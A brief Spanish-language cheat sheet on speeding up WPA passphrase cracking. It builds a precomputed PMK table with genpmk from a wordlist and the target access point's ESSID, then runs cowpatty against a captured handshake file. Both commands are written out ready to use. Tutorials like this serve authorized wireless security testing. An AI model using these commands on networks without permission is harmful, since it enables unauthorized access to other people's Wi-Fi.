Aumentar velocidad de cracking en coWPAtty por Rainbow Tables
Creación de Rainbow Table con GenPMK para aumentar velocidad de cracking de coWPAtty.
Crear Rainbow Table con GenPMK entregando diccionario, el ESSID del AP objetivo y un nombre al fichero de salida
genpmk -f dictionary.txt -s <NAME_AP> -d output_file.genpmk
Ejecutar coWPAtty sobre el fichero .genpmk con la Rainbow Table de contraseñas precomputadas
cowpatty -r traffic_file.cap -d output_file.genpmk -s <NAME_AP>